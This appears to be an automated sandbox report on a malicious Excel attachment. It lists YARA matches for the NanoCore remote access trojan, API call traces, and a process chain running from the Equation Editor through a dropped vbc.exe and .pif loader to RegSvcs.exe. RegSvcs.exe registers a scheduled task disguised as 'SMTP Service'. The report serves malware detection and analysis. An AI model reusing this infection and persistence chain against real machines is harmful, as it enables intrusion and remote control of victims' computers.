Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

5_2_00FE33A3

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FF59E6 appears 65 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FC6B90 appears 39 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FC14F7 appears 36 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027E2F0 appears 31 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027D940 appears 51 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027D870 appears 35 times

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00266FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

4_2_00266FC6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Import order764536.xlsx

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@16/49@20/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00266D06 GetLastError,FormatMessageW,

4_2_00266D06

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

4_2_0027963A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ........................................(.P.............p.......x.......H................................................................. .....

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {65A54373-42CF-48A1-B53D-BB3CC40C1C58} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: unknown	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\MMUIQL~1.PIF' C:\Users\user\33920049\fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		5_2_00FE33A3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01014AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,		5_2_01014AEB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD47D.tmp

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0101E0F6 CoInitialize,CoCreateInstance,CoUninitialize,

5_2_0101E0F6

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100D766 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

5_2_0100D766

